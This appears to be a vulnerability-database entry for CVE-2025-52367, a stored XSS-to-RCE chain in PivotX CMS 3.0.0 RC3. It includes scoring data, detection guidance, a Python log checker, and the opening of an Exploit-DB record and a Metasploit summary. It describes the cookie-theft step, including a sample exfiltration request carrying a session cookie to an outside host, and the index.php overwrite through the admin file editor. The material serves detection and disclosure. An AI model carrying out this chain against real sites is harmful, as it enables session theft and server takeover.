CVE-2025-52367
Published: 2025-09-22
CVE-2025-52367: Cross Site Scripting vulnerability in PivotX CMS v.3.0.0 RC 3 allows a remote attacker to execute arbitrary code via the subtitle field.
Priority: P3 · 35 · medium · CVSS 3.1 base score: 5.4
CVSS 3.1 vector: AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
Exploit: available
EPSS: 4.25% (89.8th percentile)
Affected (1 range):
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| pivotx | pivotx | — | — |
Detection & IOCs (extracted from sources)
- Monitor HTTP requests containing XSS payloads in the 'subtitle' or 'title' POST parameters targeting PivotX page creation endpoints (index.php?page=page).
- Alert on access to the PivotX file editor endpoint (index.php?page=homeexplore), especially from sessions that recently received stolen admin cookies, as this is the pivot point from XSS to RCE.
- Detect the cookie-stealing XSS exfiltration pattern: outbound GET requests to attacker-controlled hosts with a query parameter named 'c' containing session cookie values (e.g., /bruh?c=<cookie>).
- Detect writes to the PivotX index.php file via the admin file editor, which is the final RCE step; monitor file modification events on the webroot index.php.
- The exploit chain requires only a normal (non-admin) authenticated user to initiate; alert on page creation requests from low-privilege accounts containing HTML/script tags in title or subtitle fields.
- The vulnerable code path is savePage() in modules/pages_flat.php using saveSerialize() with no sanitization; consider file integrity monitoring on this module file.
- Only the 'body' and 'introduction' fields pass through TinyMCE HTML encoding; 'title' and 'subtitle' are rendered as raw HTML with no sanitization, making them the sole injectable attack surface.
- The Metasploit module targets the admin file-edit feature to overwrite index.php; this RCE step requires valid admin credentials (obtained via the XSS cookie-theft step).
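As an added example (not code from the Exploit-DB entry or the Metasploit module), the detection points above expressed as a small Python checker run over constructed sample access-log lines; the log format, the user names, the `ADMIN_USERS` set and the 203.0.113.7 host are assumptions:

```python
"""Flag the CVE-2025-52367 chain steps (stored XSS -> cookie exfil -> file editor -> index.php write)."""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample log; hypothetical format: user method url form-body status
SAMPLE_LOG = """\
editor POST /pivotx/index.php?page=page title=Hello&subtitle=World 302
editor POST /pivotx/index.php?page=page title=Hello&subtitle=%3Cscript%3Ex%3C%2Fscript%3E 302
- GET http://203.0.113.7/bruh?c=pivotx_sess%3Dabc123 - 200
admin GET /pivotx/index.php?page=homeexplore - 200
admin POST /pivotx/index.php?page=homeexplore file=index.php 302
"""

TAG_RE = re.compile(r"<\s*/?\s*[a-z!]", re.IGNORECASE)  # any HTML tag opener
ADMIN_USERS = {"admin"}  # assumption: which accounts are legitimately admin


def parse_line(line):
    user, method, url, body, status = line.split(" ", 4)
    return {"user": user, "method": method, "url": url, "body": body, "status": status}


def check_line(rec):
    """Return the list of alert names raised by one log record."""
    alerts = []
    parts = urlsplit(rec["url"])
    query = parse_qs(parts.query)            # parse_qs percent-decodes values
    page = query.get("page", [""])[0]
    form = parse_qs(rec["body"]) if rec["method"] == "POST" else {}
    # Step 1: HTML in the unsanitized title/subtitle on the page-creation endpoint.
    if page == "page":
        for field in ("title", "subtitle"):
            if any(TAG_RE.search(v) for v in form.get(field, [])):
                alerts.append(f"html_in_{field}")
                if rec["user"] not in ADMIN_USERS:
                    alerts.append("low_priv_html_injection")
    # Step 2: outbound request to an external host carrying a cookie in the 'c' parameter.
    if parts.netloc and "c" in query and "=" in query["c"][0]:
        alerts.append("cookie_exfil_pattern")
    # Step 3: file-editor access, and a write targeting index.php (the RCE step).
    if page == "homeexplore":
        alerts.append("file_editor_access")
        if rec["method"] == "POST" and "index.php" in form.get("file", []):
            alerts.append("index_php_write")
    return alerts


def scan(log_text):
    """Map line number -> alerts for every non-empty line of the log."""
    return {i: check_line(parse_line(l))
            for i, l in enumerate(log_text.splitlines(), 1) if l.strip()}
```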
No detection rules found.
Exploit-DB: PivotX 3.0.0 RC3 - Remote Code Execution (RCE)
exploitdb · 2025-07-16 · CVSS 5.4 · CVE-2025-52367 [MEDIUM]
---
# Exploit Title: PivotX v3.0.0 RC3 - Stored XSS to Remote Code Execution (RCE)
# Date: July 2025
# Exploit Author: HayToN
# Vendor Homepage: https://github.com/pivotx
# Software Link: https://github.com/pivotx/PivotX
# Version: 3.0.0 RC3
# Tested on: Debian 11, PHP 7.4
# CVE : CVE-2025-52367
## Vulnerability Type:
Stored Cross-Site Scripting (XSS) in the "title" and "subtitle" fields of page creation. The input is not sanitized and is stored directly to disk via PHP serialize().
## Root Cause:
In 'modules/pages_flat.php', function 'savePage($page)' stores page data via 'saveSerialize()' without any sanitization. The stored values are later rendered in the admin panel without escaping.
Only the 'body' and 'introduction' fields are pass
Metasploit: PivotX Remote Code Execution
This module gains remote code execution in the PivotX management system. PivotX allows an admin user to directly edit files on the webserver, including PHP files. The module exploits this by writing a malicious payload into the `index.php` file, gaining remote code execution.
No writeups or analysis indexed.